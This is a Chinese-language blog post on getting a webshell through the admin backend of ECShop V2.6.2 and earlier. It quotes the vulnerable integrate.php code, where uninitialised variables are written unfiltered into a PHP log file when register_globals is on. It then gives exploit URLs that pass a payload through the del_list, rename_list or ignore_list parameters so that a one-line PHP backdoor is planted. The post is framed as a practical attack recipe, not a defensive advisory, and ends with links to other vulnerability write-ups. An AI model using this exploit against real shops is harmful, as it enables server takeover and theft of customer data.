ECSHOP前段时间出了个注射漏洞：http://bbs.wolvez.org/topic/67/，拿后台权限应该没有问题，但文章没有提及如何在后台拿shell。昨天可乐在t00ls.Net上发帖问如何拿shell，无聊中我baidu、google了下，网上貌似没有拿shell的办法。好久没读代码了，无聊中下了ECSHOP最新版（V2.6.2）的源码过来读，很庆幸，给我找到一个可以直接写shell的文件。与注射一样，同样是个变化未初始化导致的问题，于是，同样只能用在register_globals为on的环境下。

integrate.php第740行起：

复制代码代码如下:

if ($_REQUEST['act'] == 'sync')

{

$size = 100;

......

$tasks = array();

if ($task_del > 0)

{

$tasks[] = array('task_name'=>sprintf($_LANG['task_del'], $task_del),'task_status'=>'' . $_LANG['task_uncomplete'] . '');

$sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 2";

$del_list = $db->getCol($sql);//$del_list未初始化

}

if ($task_rename > 0)

{

$tasks[] = array('task_name'=>sprintf($_LANG['task_rename'], $task_rename),'task_status'=>'' . $_LANG['task_uncomplete'] . '');

$sql = "SELECT user_name, alias FROM " . $ecs->table('users') . " WHERE flag = 3";

$rename_list = $db->getAll($sql);//$rename_list未初始化

}

if ($task_ignore >0)

{

$sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 4";

$ignore_list = $db->getCol($sql);//$ignore_list未初始化

}

......

/* 保存修改日志 */

$fp = @fopen(ROOT_PATH . DATA_DIR . '/integrate_' . $_SESSION['code'] . '_log.php', 'wb');

$log = '';

if (isset($del_list))

{

$log .= '$del_list=' . var_export($del_list,true) . ';';

}

if (isset($rename_list))

{

$log .= '$rename_list=' . var_export($rename_list, true) . ';';

}

if (isset($ignore_list))

{

$log .= '$ignore_list=' . var_export($ignore_list, true) . ';';

}

//未做过滤，直接写log

fwrite($fp, $log);

fclose($fp);

$smarty->assign('tasks', $tasks);

$smarty->assign('ur_here',$_LANG['user_sync']);

$smarty->assign('size', $size);

$smarty->display('integrates_sync.htm');

}

$del_list、$rename_list、$ignore_list均没有初始化，于是，均可以直接写shell。

利用方法：

http://www.oldjun.com/admin/integrate.php?act=sync&del_list=

http://www.oldjun.com/admin/inte ... nc&rename_list=

http://www.oldjun.com/admin/inte ... nc&ignore_list=

三个链接，随便输入一个就可以了，生成http://www.oldjun.com/data/integrate__log.php，就是一句话小马了~

【ECShop网店系统<=V2.6.2 后台拿webshell】相关文章：

★ Nagios插件超长位置头远程缓冲区溢出漏洞

★ 世界之窗等浏览器本地xss跨域漏洞POC

★ 新云CMS Online.asp页面过滤不严导致SQL注入漏洞

★ Windows Vista中IE漏洞击穿系统分析

★ 恒浪IMS整合系统V4.1 多文件存在SQL注入漏洞

★ Numara MRchat.pl MRABLoad2.pl远程命令执行漏洞

★ DedeCms V5.1 tag.php注入漏洞

★ 谨防黑客利用微软DirectShow漏洞传播木马

★ ShopWind网店系统与罗信网络建站 v1.02 上传漏洞

★ 野草weedcmsV5.2.1 任意删除文件漏洞